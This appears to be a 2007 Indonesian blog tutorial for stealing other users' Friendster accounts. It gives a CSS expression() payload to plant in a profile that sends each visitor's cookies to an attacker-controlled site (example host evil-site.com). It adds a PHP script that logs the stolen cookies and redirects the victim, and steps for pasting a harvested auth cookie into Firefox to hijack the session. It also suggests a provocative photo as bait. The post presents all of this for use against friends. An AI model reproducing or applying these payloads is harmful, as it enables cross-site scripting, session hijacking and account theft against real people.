sebenere ini tutor uda lama banget mungkin master2 pade ngetawain tulisan sayah😛.. so cueks ajah kakwkakwakw “ini adalah merupakan…. cara yang sedikit agak curang dengan mencuri pass dan login fs milik orang lain… cara kerjanya adalah mengelabui…. orang yang buka fs kita dengan menampilkan gambar ato foto yang menantang… dengan foto tersebutlah kita bekerja…

ingin tau bagai mana cara dan sistem kerjanya….

simak cerita berikut ini………..

knapa meski FS ?
taw deh skrng2 gw so bored. programming? hmmmm bored too.
sudahlah…

ok lah, langsung weh…

syarat :

1. Punya FS (wajib :P) sign up yah
2. Punya sites, buat yg gratisan yg support script PHP untuk melihat/eksekusi  cookie yag sudah kita tanam
3. gunakan mozilla
langkah-langkah :

1. login FS
2. masuk ke profile–>edit profile–>customize
3. pate code berikut di bagian CSS (Upload an image with PhotoBucket) untuk
menjalankan javascript
(penempatan bisa dimana saja, atas/bawah)

naon_wae_lah(apa aja lah) {
height :
expr/**/ession(document.location=’http:///.php?kukis=’+document.cookie)
}

a. yoursite=site yg dah dibikn pake situs gratisan (lihat syarat no 2), contoh :
http://www.evil-site.com
b. yourfile=file untuk menanam cookies pada situs gratisan (lihat a), contoh:
cook.php

4. buat file cook.php(lihat b)

——————————————————————–

{?php
$kokis = $HTTP_GET_VARS[’kukis’];
$filename = “cok.log”;

‘// metoda dengan append append

$handle = fopen($filename, ‘a’);
fwrite($handle, $kokis);

fClose($handle);
‘// redirect-in ke punya tmn lo
echo “{script}document.location=’http://www.friendster.com’;{/script}”;

?}

——————————————————————–
Jangan lupa rubah tanda ‘{’ jadi ”
tanpa tanda curek.

trus kl dah gt, ngpain ? kacape-kacape.
hmmmmm, ….., ya udah cma gt doang
cari target tmn lo. ( pasang foto yg agk cakepan dikit… hehehehee, buat
mancing doang)
biarkan tmn lo buka profile lo.

ya, memang profile lo gk da bs dbuka, tp liat di
http:////cok.log kaekkekae
Panen gk ya…!!!, ya gmn muka see…. he..he..he
dah dulu ah, ….so boredddd……….!!!
eh bentar dulu mo kmana..!!! blon beres yeeeeeeeeeeeeeehhhh.
trus kl dah panen gmn ?

nynt dunk..
cari aja nama cookies “friendster_auth=uid” di
http:////cok.log
nama cookies yg laen sprt: friendster_auth=deleted,friendster_pusit_auth=uid
abaikan saja

contoh hasil panen :
friendster_auth=uid=33674163&lastclick=1163646748&cty=id&icty=au&mac=
ODEwYjgyMjE1ZDAwYTlkM2Q0NTc5ZjM3MmMyMzY3ODk*

trus di apain ?
Buka pake notepad aja :
C:Documents And SettingsAdministratorApplication
DataMozillaFirefoxProfiles.defaultcookies.txt

replace karakter ascii “=” dengan %3D
replace karakter ascii “?” dengan %26
replace karakter ascii “*” dengan %2A

Trus ?
trus, trus mulu ky tukng parkir….heheheh
hapus semua var Cookie, trus isikan text dibawah ini

.www.friendster.com True / False XXXXXX friendster_
auth uid%3D33674163&lastclick%3D1163646748&cty%3Did&icty%3Dau&mac

%3DODEwYjgyMjE1ZDAwYTlkM2Q0NTc5ZjM3MmMyMzY3ODk2A

Close smua browser, buka mozilla,……
trus………., ya lihat disamping kanan “LOGOUT” N Foto victim cakep bukan
????////

daftar pustaka : berbagai sumber😛 <plagiater X> wakakaka

~ by admin on mey 14, 2007.